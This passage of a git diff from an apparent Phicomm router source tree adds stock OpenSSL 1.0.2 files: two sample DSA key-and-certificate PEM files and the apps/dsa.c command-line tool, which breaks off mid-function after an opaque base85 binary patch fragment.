z;pLsyeW4h?$QYUJJ<JR6k$&Jbz_-jYM%ul$N*|#mcIeGd3(r}4Y5&R2vqKE|-x-fk
z&kdid*?%i}quEni##P(HZ4Xa4|Gw>Xw*Mvnsj!Tn#)0b0{lOJMnE6kPHBT=#z%>Gc
zI0EBa{|5o^uuuS(x|;``kG`p?V-HZbiI|+;l#Ot@2u#<}V{LdB>BkPx!JxP*)njsr
zF%tGx9_9se(xB8BBV;RT9h*n4$dj&FvyA+&sV4*`GEb}7|79LcdiCfi&X62E=EZs|
zbX_!!=8e5Ux7;bZ^UAE*#(`oXqiK`T^vS5Q6jALRTCT(wp@kICTVlD`XUA@g?5oTl
z6>&UTDIyh9B$$8pK<CVRKKlLPQBqH=H~fx5!9#o;{KBydD0oR9n@wKqcI8h=Ht{^!
zR~gQK<|^cu1}Wf`hpaW4<Q>Zi?`yf|qfdrk%6VLVVpJ|su;%YtXG-$|;qjxB;-Dth
z{-0GV8Ye@Tl<&&_dsqGxuP?;`CP289VR=b@gzjNlL*4xW?wlo<#@egZ4D;lp?A)^4
zT<3nuzaP%OD?%GThl|Q{YmA|N9kdeh%(YrX5e-TQ719h^<Jj42;>1uETQI)R_V&V*
zO8ed$FQ?Z~y7#QpoOOm*d72IOtzuBgT<886uNMBsmeM21ps8@p6tCoouKWkvwg;~Z
zZVz4`j2vxBrh3zv0j(*Wv+PVVB`&n4Si+3$(3&iBm!&nuv(dq5CQ8Cittpizwbm5S
zn%cCcOf(hO>gX@4Z%Yqa$#g2aUEh|<4fG_f?DlHyri7U>by=cEGiJ4>%UbEGPuKNi
zYA|Q%Tzk~goAh*w<h^=Vs9WC{TE}V`n=Pk{KO#@2q+{~!I8XMAddaw0=6I52P7~Qm
z&zRA;p3dlfX3ES&EmQB>6x2lzn3kEzHtMl-YNwg8bStfQ862eOE@4Xt`@%|)odIU7
z<NkDH`d}uRqKI?>xd*uAQ<`;7*idGJ-3Of%MO?HifTa^L7vt4)*<_0PI-p0h!oSo|
z3wK8QbHYd4f73^s+J_u<>4>k)47Z4<0*wTB)<kgiakDp?>$mhkbL-Lu?irp*dM}Me
zUCciEd_Ll(sY&lo)6j4qu}H6{CO8*%9aIueX3UtC&g^cWTCMaXCv3pAr3Z8w<V1gP
zAYy(y)uz(AJyEK)36VY!-L0q6mfmC1P^YtIil?t@j?mPPW>VDcjY2w*izRd#`%KiS
zIv%y6Vj^Xeaq1^~h&VL6C+u6MTC3}i>sfOkDJVtUv)eMWq8H3~wYJ8dpgg+nDOwlj
zjwdCR(L@`dQARaR%tjr>*=Vn6TQoZ3MXjr&+BPSW)X7=BFU=Lwa9YtFCe2?_hb5}$
zq0uS1qqBo%EZLjnU~{Qx4~-ewi9sw4cycjDSgj4(Q<badt`{wG!>C@29cnAyj>RDq
z^Iqfb?kja1Ew))JxqJ2K;Gh|$>6YekPw(()@r1a=d@*gq#?bmro5GQSXn%h?rd^oq
zP0{?;jZl!*u}GH@F{&?2regiMxT&|N2hCJA+ka_1;Y+NnzR*m?lf7KkqCV4##1nP#
z`iAPNz13P(){0umn4U{zlYJ>OPIHZ_XF+6e+x8WEwd$%Wt$9~nbKsgr&hK0PhfMl}
zNfp-<Pb??z$zHv_KAu=X(WT6r>KhvL6)W`hTf*T6TK=qDCRHyk$Z0&$v~qC8s`Zhc
zWGc{;A|no=F`L|DrhDa8L!+%G$1Lx2%lk^?eIS={P!+`hZoXM3zvN~DHE2~;duch1
z^kz(x${LoJMyc<!EABT_eO5wWq0@cCt&~k+gX*e%8c$DW;kTbS6Z2Et!&JuW3QoqG
zGD&^_l+H$NO=st2di|E3T*}Jn%X}@q<|hA=oVfIVG0^O5Zf&qJzn5wBzOV7l6u%L#
zS-(Z2*S=9^^!_W-TzM|r)2)^5sx4bEduHXG^a9BnPh#_l&UdgT<f$E+w#K7R+v}-a
z?Ww$uP&;!<f5!W9t39<}o3_d`?~d|S9{s@dRi65<Rs=oGU!GxjmJZDfd;YSlJY3;<
zplp-pk+Li3+{NUx3eVCmPjk>yPex?C%2T__Qz@J(4ip-->11K5;&P2kC#Uj>)|Qr)
zi{2?^+>~kHN3>l^%0(}h>iMc%n>iT@K6O*dwW>+_(*@yCDotmJ%L?9SC`k(>x9y5W
zy5wgTk;v6aKHtR`Nq)YIUn=><F5W7+-^G_nZkHDeS4s}s#e#H7ZkHGJYb6gBk;rY3
ze2t55k^Bl5-zIsFi$^8Txp<%C_q+Ij<S)5+R`L@rzFYDt*HpYka>K=kCFd<wOe2zi
z-^IT!`7<v59m%Wc2FG-t<m+7AZfAvdyNmy|)PL8-AC~+*7ynzy=Qs<BxYo4CByV!@
zCnewR;>RSv-^Gth{-le)EctI-{8h;><wXwC8zNt!b-Vb#NuF}?amf$3_({nha`BHO
z7mKUN+lNmjf8C`o7vo3wJN;p@=S_uno{QH={Yn=<Q*y(_7f61!i=Qv~?Jj<?<oCIF
zljKKSyhZY-Tzr}2&%5~LlK<4jLz16#@hc_&#Kk`^dEE@`HBGx(^35*3UGgCpk4gRm
z7f(ul+{M$9zvbdN$>+~3jc2dqCtZ40m1~pXt)%DYv^#xA!4E3<g9`o_@iXYT<~+~D
zGn*=VPN9EM!Cz7Ew-x+-1wX0apDOrtT6d=EpV<mNN5Rik@Wl$gM!~l#cuK){D)`qG
z{9XnBD+T|7f<LR^uPOMO3eM~PRQ>;31)oOi@>KeB6#OCuZ&&b61@BhyZ3=#ag7+)<
z*^2h=QRw$8_?-%VpMpQA;7=*|s|x<Mg7b59s_}xan(;&=)}#5toy~mk^C7^87CyA{
zp^XoV`LKi!OZl*j4}RN3*!YE!Us(BtnP1rXg`r<q`h}@q*an1cz^+f&283-u*an1c
zK-dO^Z9v!tgl&tkZ4tIDcCf;>McB3o+ZJKlB5YfPZHusN6}GLywpG}++AS5ft-`id
z*tQDWR$<#JY}<rwo3L#Ywr#?;P1v>x+csg_CT!b;ZJV%NENmAGtHpjTvL?J?RWKac
zuzK~T(B{bI;Hq#aqODrHAtJsWid@Xf^lOm_eQS^Hh{O^*BE8XMzcX^QH9%Xd{6#+6
zuk|F;5i^q!R@n%D;S^c=8m?t6+6>BQyg?G7O~&42AE8WaV31FN-T_O?W@FJ*uP_k%
zhrL>;yE|eVWOff)X^MdM75lP+3kg@2&SW*(!H9GR*LT@!QSW4w)o5dew*<sl?wFX7
z;%;KZ+$D<Qxk1|65Ly0GPFonZl@U=GP1Gg&%x*Wem-=N;1gOOW$p}?0s>*7?P3!#;
zM$}yz?FC18SC%h8BP<MQP^xh#)j;3sDLPvf5k11e+B@8|o1E2XZ-aIM$v5RYyRY52
zd4sc+!@C}|=|M3{E}EJQ#Hr~RCle=5yLlo|V;97RTw<O<!lRRk&<+v@C!ltXd=cT-
z)+_1rp9MSde?U1g57Wot_V*i`uLJ%Z<vFpQzr#8D7a3Bb<y6~9pHHO!R~S-a{pac9
z=<WA+n|A|$m-3t(KaT#lHWqvn<sCkq-Y+=0<DVtD+mHCghSYDSv*YJ>&{qTh2KeXi
zrjGt0;8y_`KUAV?u9x>796kRNj}ym<eqIHRetso6`{DoRIez{F^yp_U3n}sGH2OID
zg_67LT>*Lz=tBzqX3*Dw{yK$z2k7}Z<iwLz=)VN|(?RcipLNH759rST{XvEQM?gOZ
z^oJDsW1#0fH7EWT6?%UE;>4#j>Er0%R_OVCiW3*}o{*!jmYmyrHE@1^;lz5rzZ`uQ
z_}Reu{e=_z;d|fF-wJy4a~p8}QJSOwn!?YwL63g;eTNgrc@BLXKi^aMc?k6A=SRSK
zkIV7%sKU=E=+VzH;JnA?`1wbLpPz#s{k#sG_fZ``zfkyjAN1(wB=FCHpWi9`6hM!D
zX7IpL;(k7tK2AKRN$wu^xu8cs3xJ;oelAe>X#hR?;UA)K;&^oWIPok|_*n^h^b-Pp
zKKKbM{A>a}`q>Kn0`L=6_(^~s{iK0k2!3`d{Okig`neOh7yR6%@N+Nd(a-(B>%h;0
z3O_#tJ^DEW{37u4gu>6WphrK)fnN-M{z>8IUw~f=`ZMId5EtWn!hGQPp3o#Y&o_)G
z0Q#-qpMNaI$*tcAyq?OPdF$-6aXh$w#z2qt-UjvZUbW-rZiW6YfH#2td*BD_{V{O<
zUyb8m{4|QL-R*i3{PX_=9Q_O62mSvX_;%3034XA>?*YFA^v=GYyWi%>Ei&fUgWlQq
zV;%wC4Eh^@w@dDBZxHl2?pFejf}d`MpBV5)(BBAtu;0D_dhDM)z?;C&Eeby)phrL7
z20gaxVc<RB|FFW()1Z%m{uR*2fxioS{9f>xg3p%wr96%%_|YYIkJrV(eW3S&AMEFD
z$$2jKg8o|IIB%oirw{aL;0fSgl-wQXFz`!3|5fmVaefo@IF5IN9>?+fz;XWn2>1<9
z?-7Onqo7CsFH6q-mIObq0mu8|ZSd0v`VWBL2)rP<yWeKWe{eEy2K^k#d7fau%?Ca9
z+j*eJb~OUW=S3@Ud|q@a{I3T+`riTi9T5K>(BpmaO$GlhaJ(<XPd&*m_d`GU{~729
zfWI!eyPw|zJ;wig(EGv9XP{33pIt>4l-PfOKF;&vbjdkR)Sn0X7SMYY`T*$pf69*k
zB?^5A^lhNOLZQDNcpCIc1<!&1#h||(^n<|f0sRu-e-3&a--kiJ6!edR9{cks=$C>1
zdC-3W_&)>B0DlwwTn2m`^yp_+HHj$kxG$%VGcIRH&f|{yb3xC)7jg896#6BgUjh0c
z=&>K@cbXz`z1Xg+!4Ln&z^S(f^cd%tK#%RpEA)4P9@}+Lq5m7uW4nF~dTiHW&|ePm
zKcUb+3;GVwzo5{+2KpfA-vB-K&#yth3iKZ;^dE!16Z8epV|!=t<`*TNS6%dR#%q@3
z?)78==tH2t0Q4At1L#+S-UoV&XEE?B=r>5dh?oU@E9i5;bHH~3|BB??UVMJt0elVU
z?*c#g9K09w=;t8lah-nv_)XydhYCN3fE%EH0{mb+uK?c#`gefu27VIw9^k(Negp6`
zX43^Fo)5UstTUv<{mCCEb;yjv?{Ery+1&$Hl>VPZ|Ff{q2`85^`=dVb^K&2nR95r#
zWV4ztljaMS`+f9}omhHcz)V@1kA4$s`sk;1P2%4#^13gT^9^R`_m&xJH<_|SGeKMH
z(E(oc{{%@VA7%8Buh$bEJ7lh2_LEb<T1>pR#eLX;kn)vY8$80BjFfm7*jBy<X!96S
zx`;l^<#rPzkrJ+Y9qz8bkqX%7|JL45w(OJNJuo@-FO%<?PMK4`bMBx5&Nn*(c|ORS
zy_7DoPZLMS&N;885+^?)qRc-?dt{t<Yk4n&L&Uktx}QpWoi89c{qG=N+t{bu{sU=$
zw<DBiw|zhHsmA{hzXVWn`h~}zUj-a{XZ)wCo9%An&2K)-`<JJ~74&i2vrqTf6VhsR
dK5E)Wu0nVJolY8;MA-dO#=low6%TIv{{r`T%%cDR

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-ca.pem
new file mode 100644
index 0000000..cccc142
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-ca.pem
@@ -0,0 +1,40 @@
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2GlrMV4FMuj+BZgnOQ
+PnUxmUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7OZq5riDb77Cjcwtel
+u+UsOSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR5HCVW1DNSQIVAPcH
+Me36bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnlaG8w42nh5bNdmLso
+hkj83pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6kQmdtvFNnFQPWAbu
+SXQHzlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15AlsQReVkusBtXOlan7Y
+Mu0OArgCgYAapll6iqz9XrZFlk2GCVcB+KihxWnH7IuHvSLw9YUrJahcBHmbpvt4
+94lF4gC5w3WPM+vXJofbusk4GoQEEsQNMDaah4m49uUqAylOVFJJJXuirVJ+o+0T
+tOFDITEAl+YZZariXOD7tdOSOl9RLMPC6+daHKS9e68u3enxhqnDGQIUB78dhW77
+J6zsFbSEHaQGUmfSeoM=
+-----END DSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE REQUEST-----
+MIICUjCCAhECAQAwUjELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
+ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDELMAkGA1UEAxMCQ0Ew
+ggG0MIIBKQYFKw4DAgwwggEeAoGBAKc/boW/QWopffCfRxkwkJoJHdpqMx7FPYaW
+sxXgUy6P4FmCc5A+dTGZR3pS+4Xk2aZ7OJtoioSbh8YetX6GS1NbWc9xZRmIbs5m
+rmuINvvsKNzC16W75Sw5JkvamnAYlTeVEFYj9hXtugRe3jlP/bdDH7WkZW/NgBHk
+cJVbUM1JAhUA9wcx7fpsBgPVhYocrJxl51BmZW8CgYBN30wDppGK9RlvUEYlmeVo
+bzDjaeHls12YuyiGSPzemQQ/X4gMnHMkDSBduSqaPxiWJ+Rih8F7dGJT/GEnqHqR
+CZ228U2cVA9YBu5JdAfOVX4jzhb2ytxaYQF+yXG1TfbcNCmHaPZeIJOz2/XkCWxB
+F5WS6wG1c6Vqftgy7Q4CuAOBhAACgYAapll6iqz9XrZFlk2GCVcB+KihxWnH7IuH
+vSLw9YUrJahcBHmbpvt494lF4gC5w3WPM+vXJofbusk4GoQEEsQNMDaah4m49uUq
+AylOVFJJJXuirVJ+o+0TtOFDITEAl+YZZariXOD7tdOSOl9RLMPC6+daHKS9e68u
+3enxhqnDGaAAMAkGBSsOAwIbBQADMAAwLQIVAJGVuFsG/0DBuSZ0jF7ypdU0/G0v
+AhQfeF5BoMMDbX/kidUVpQ6gadPlZA==
+-----END CERTIFICATE REQUEST-----
+-----BEGIN CERTIFICATE-----
+MIIBrjCCAWwCAQswCQYFKw4DAhsFADBTMQswCQYDVQQGEwJBVTETMBEGA1UECBMK
+U29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMQww
+CgYDVQQDEwNQQ0EwHhcNOTcwNjE1MDIxNDI5WhcNOTcwNzE1MDIxNDI5WjBSMQsw
+CQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJu
+ZXQgV2lkZ2l0cyBQdHkgTHRkMQswCQYDVQQDEwJDQTCBkjAJBgUrDgMCDAUAA4GE
+AAKBgBqmWXqKrP1etkWWTYYJVwH4qKHFacfsi4e9IvD1hSslqFwEeZum+3j3iUXi
+ALnDdY8z69cmh9u6yTgahAQSxA0wNpqHibj25SoDKU5UUkkle6KtUn6j7RO04UMh
+MQCX5hllquJc4Pu105I6X1Esw8Lr51ocpL17ry7d6fGGqcMZMAkGBSsOAwIbBQAD
+MQAwLgIVAJ4wtQsANPxHo7Q4IQZYsL12SKdbAhUAjJ9n38zxT+iai2164xS+LIfa
+C1Q=
+-----END CERTIFICATE-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-pca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-pca.pem
new file mode 100644
index 0000000..d23774e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-pca.pem
@@ -0,0 +1,46 @@
+-----BEGIN DSA PRIVATE KEY-----
+MIIBvAIBAAKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2GlrMV4FMuj+BZgnOQ
+PnUxmUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7OZq5riDb77Cjcwtel
+u+UsOSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR5HCVW1DNSQIVAPcH
+Me36bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnlaG8w42nh5bNdmLso
+hkj83pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6kQmdtvFNnFQPWAbu
+SXQHzlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15AlsQReVkusBtXOlan7Y
+Mu0OArgCgYEApu25HkB1b4gKMIV7aLGNSIknMzYgrB7o1kQxeDf34dDVRM9OZ8tk
+umz6tl+iUcNe5EoxdsYV1IXSddjOi08LOLsZq7AQlNnKvbtlmMDULpqkZJD0bO7A
+29nisJfKy1URqABLw5DgfcPh1ZLXtmDfUgJvmjgTmvTPT2j9TPjq7RUCFQDNvrBz
+6TicfImU7UFRn9h00j0lJQ==
+-----END DSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE REQUEST-----
+MIICVTCCAhMCAQAwUzELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
+ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDEMMAoGA1UEAxMDUENB
+MIIBtTCCASkGBSsOAwIMMIIBHgKBgQCnP26Fv0FqKX3wn0cZMJCaCR3aajMexT2G
+lrMV4FMuj+BZgnOQPnUxmUd6UvuF5NmmezibaIqEm4fGHrV+hktTW1nPcWUZiG7O
+Zq5riDb77Cjcwtelu+UsOSZL2ppwGJU3lRBWI/YV7boEXt45T/23Qx+1pGVvzYAR
+5HCVW1DNSQIVAPcHMe36bAYD1YWKHKycZedQZmVvAoGATd9MA6aRivUZb1BGJZnl
+aG8w42nh5bNdmLsohkj83pkEP1+IDJxzJA0gXbkqmj8YlifkYofBe3RiU/xhJ6h6
+kQmdtvFNnFQPWAbuSXQHzlV+I84W9srcWmEBfslxtU323DQph2j2XiCTs9v15Als
+QReVkusBtXOlan7YMu0OArgDgYUAAoGBAKbtuR5AdW+ICjCFe2ixjUiJJzM2IKwe
+6NZEMXg39+HQ1UTPTmfLZLps+rZfolHDXuRKMXbGFdSF0nXYzotPCzi7GauwEJTZ
+yr27ZZjA1C6apGSQ9GzuwNvZ4rCXystVEagAS8OQ4H3D4dWS17Zg31ICb5o4E5r0
+z09o/Uz46u0VoAAwCQYFKw4DAhsFAAMxADAuAhUArRubTxsbIXy3AhtjQ943AbNB
+nSICFQCu+g1iW3jwF+gOcbroD4S/ZcvB3w==
+-----END CERTIFICATE REQUEST-----
+-----BEGIN CERTIFICATE-----
+MIIC0zCCApECAQAwCQYFKw4DAhsFADBTMQswCQYDVQQGEwJBVTETMBEGA1UECBMK
+U29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMQww
+CgYDVQQDEwNQQ0EwHhcNOTcwNjE0MjI1NDQ1WhcNOTcwNzE0MjI1NDQ1WjBTMQsw
+CQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJu
+ZXQgV2lkZ2l0cyBQdHkgTHRkMQwwCgYDVQQDEwNQQ0EwggG1MIIBKQYFKw4DAgww
+ggEeAoGBAKc/boW/QWopffCfRxkwkJoJHdpqMx7FPYaWsxXgUy6P4FmCc5A+dTGZ
+R3pS+4Xk2aZ7OJtoioSbh8YetX6GS1NbWc9xZRmIbs5mrmuINvvsKNzC16W75Sw5
+JkvamnAYlTeVEFYj9hXtugRe3jlP/bdDH7WkZW/NgBHkcJVbUM1JAhUA9wcx7fps
+BgPVhYocrJxl51BmZW8CgYBN30wDppGK9RlvUEYlmeVobzDjaeHls12YuyiGSPze
+mQQ/X4gMnHMkDSBduSqaPxiWJ+Rih8F7dGJT/GEnqHqRCZ228U2cVA9YBu5JdAfO
+VX4jzhb2ytxaYQF+yXG1TfbcNCmHaPZeIJOz2/XkCWxBF5WS6wG1c6Vqftgy7Q4C
+uAOBhQACgYEApu25HkB1b4gKMIV7aLGNSIknMzYgrB7o1kQxeDf34dDVRM9OZ8tk
+umz6tl+iUcNe5EoxdsYV1IXSddjOi08LOLsZq7AQlNnKvbtlmMDULpqkZJD0bO7A
+29nisJfKy1URqABLw5DgfcPh1ZLXtmDfUgJvmjgTmvTPT2j9TPjq7RUwCQYFKw4D
+AhsFAAMxADAuAhUAvtv6AkMolix1Jvy3UnVEIUqdCUICFQC+jq8P49mwrY9oJ24n
+5rKUjNBhSg==
+-----END CERTIFICATE-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.c
new file mode 100644
index 0000000..dedf8e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.c
@@ -0,0 +1,374 @@
+/* apps/dsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_DSA */
+#ifndef OPENSSL_NO_DSA
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+# include <time.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/dsa.h>
+# include <openssl/evp.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+# include <openssl/bn.h>
+
+# undef PROG
+# define PROG    dsa_main
+
+/*-
+ * -inform arg  - input format - default PEM (one of DER, NET or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -des         - encrypt output if PEM format with DES in cbc mode
+ * -des3        - encrypt output if PEM format
+ * -idea        - encrypt output if PEM format
+ * -aes128      - encrypt output if PEM format
+ * -aes192      - encrypt output if PEM format
+ * -aes256      - encrypt output if PEM format
+ * -camellia128 - encrypt output if PEM format
+ * -camellia192 - encrypt output if PEM format
+ * -camellia256 - encrypt output if PEM format
+ * -seed        - encrypt output if PEM format
+ * -text        - print a text version
+ * -modulus     - print the DSA public key
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int ret = 1;
+    DSA *dsa = NULL;
+    int i, badops = 0;
+    const EVP_CIPHER *enc = NULL;
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, text = 0, noout = 0;
+    int pubin = 0, pubout = 0;
+    char *infile, *outfile, *prog;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine;
+# endif
+    char *passargin = NULL, *passargout = NULL;
+    char *passin = NULL, *passout = NULL;
+    int modulus = 0;
+
+    int pvk_encr = 2;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+# ifndef OPENSSL_NO_ENGINE
+    engine = NULL;
+# endif
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-pvk-strong") == 0)
+            pvk_encr = 2;
+        else if (strcmp(*argv, "-pvk-weak") == 0)
+            pvk_encr = 1;
+        else if (strcmp(*argv, "-pvk-none") == 0)
+            pvk_encr = 0;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+        else if (strcmp(*argv, "-modulus") == 0)
+            modulus = 1;
+        else if (strcmp(*argv, "-pubin") == 0)
+            pubin = 1;
+        else if (strcmp(*argv, "-pubout") == 0)
+            pubout = 1;
+        else if ((enc = EVP_get_cipherbyname(&(argv[0][1]))) == NULL) {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile >outfile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg     input format - DER or PEM\n");
+        BIO_printf(bio_err, " -outform arg    output format - DER or PEM\n");
+        BIO_printf(bio_err, " -in arg         input file\n");
+        BIO_printf(bio_err,
+                   " -passin arg     input file pass phrase source\n");
+        BIO_printf(bio_err, " -out arg        output file\n");
+        BIO_printf(bio_err,
+                   " -passout arg    output file pass phrase source\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e       use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err,
+                   " -des            encrypt PEM output with cbc des\n");
+        BIO_printf(bio_err,
+                   " -des3           encrypt PEM output with ede cbc des using 168 bit key\n");
+# ifndef OPENSSL_NO_IDEA
+        BIO_printf(bio_err,
+                   " -idea           encrypt PEM output with cbc idea\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, " -aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, " -camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc camellia\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err,
+                   " -seed           encrypt PEM output with cbc seed\n");
+# endif
+        BIO_printf(bio_err, " -text           print the key in text\n");
+        BIO_printf(bio_err, " -noout          don't print key out\n");
+        BIO_printf(bio_err, " -modulus        print the DSA public value\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+
+    if (!app_passwd(bio_err, passargin, passargout, &passin, &passout)) {
+        BIO_printf(bio_err, "Error getting passwords\n");
+        goto end;
+    }
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
